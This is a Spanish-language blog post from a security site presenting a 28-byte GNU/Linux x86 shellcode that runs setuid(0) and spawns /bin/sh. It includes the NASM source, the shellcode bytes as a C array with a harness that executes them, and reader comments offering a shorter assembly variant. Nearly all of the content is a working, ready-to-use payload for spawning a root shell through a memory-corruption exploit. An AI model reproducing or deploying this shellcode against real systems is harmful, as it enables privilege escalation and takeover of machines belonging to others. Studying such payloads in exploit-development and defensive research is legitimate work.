Home > ASM, C/C++, GNU/Linux, Programacion, Shellcodes > Smallest GNU/Linux x86 setuid(0) & exec(“/bin/sh”,0,0) Stable shellcode – 28 bytes

Smallest GNU/Linux x86 setuid(0) & exec(“/bin/sh”,0,0) Stable shellcode – 28 bytes

Después de todo lo que hemos hecho, vlan7 me avisó de que las shellcodes anteriores sobre las que habíamos estado trabajando, estaban mal escrita, ya que ambos estábamos metiendo el uid de la llamada setuid en el registro ecx, en lugar de ebx…. Un fallo sin perdón, sin duda.

Así que después de meditarlo bien, retocar la shellcode, probarla en diferentes entornos, modificando la pila, los registros, etc. He llegado a esta shellcode estable de 28 bytes que realiza corréctamente ambas llamadas, setuid & execve:

Código para nasm:

global _start
section .text
_start:
;setuid(0)
xor ebx,ebx
lea eax,[ebx+17h]
cdq
int 80h
;execve("/bin/sh",0,0)
xor ecx,ecx
push ecx
push 0x68732f6e
push 0x69622f2f
lea eax,[ecx+0Bh]
mov ebx,esp
int 80h

Código en C:

#include 

const char shellcode[]= "\x31\xdb"
			"\x8d\x43\x17"
			"\x99"
			"\xcd\x80"
			"\x31\xc9"
			"\x51"
			"\x68\x6e\x2f\x73\x68"
			"\x68\x2f\x2f\x62\x69"
			"\x8d\x41\x0b"
			"\x89\xe3"
			"\xcd\x80";

int main()
{
	printf("\nSMALLEST SETUID & EXECVE GNU/LINUX x86 STABLE SHELLCODE"
			"WITHOUT NULLS THAT SPAWNS A SHELL"
			"\n\nCoded by Chema Garcia (aka sch3m4)"
			"\n\t + sch3m4@safetybits.net"
			"\n\t + http://safetybits.net"
			"\n\n[+] Date: 29/11/2008"
			"\n[+] Thanks to: vlan7"
			"\n\n[+] Shellcode Size: %d bytes\n\n",
			sizeof(shellcode)-1);

	(*(void (*)()) shellcode)();

	return 0;
}
Categories: ASM, C/C++, GNU/Linux, Programacion, Shellcodes Tags:
  1. February 14th, 2010 at 04:04 | #1

    I am very impressed with the article I have just read. I wish the writer of safetybits.net can continue to provide so much worthwhile information and unforgettable experience to safetybits.net readers. There is not much to state except the following universal truth: A person who says something is impossible is usually interrupted by the person doing it. I will be back.

  2. Tom Madsen
    March 8th, 2010 at 01:23 | #2

    Wouldn’t:

    bits 32
    global _start
    section .text
    _start:
    xor ebx,ebx
    push byte 23
    runit:
    pop eax
    cdq
    int 0×80
    xor ecx,ecx
    push ecx
    push 0x68732f6e
    push 0x69622f2f
    mov ebx,esp
    push byte 11
    jmp short runit

    be one byte shorter?

  3. April 25th, 2010 at 20:22 | #3

    I’m sorry, I’ve been offline for a long time.

    About your comment, I haven’t tested it however if it always works taking care about registry contents (garbage), could be valid.

    On the other hand, it’s possible to do it smaller, I remember versions made by vlan7 or me about 24/25 bytes, but unstable.

    Good work ;)

  1. No trackbacks yet.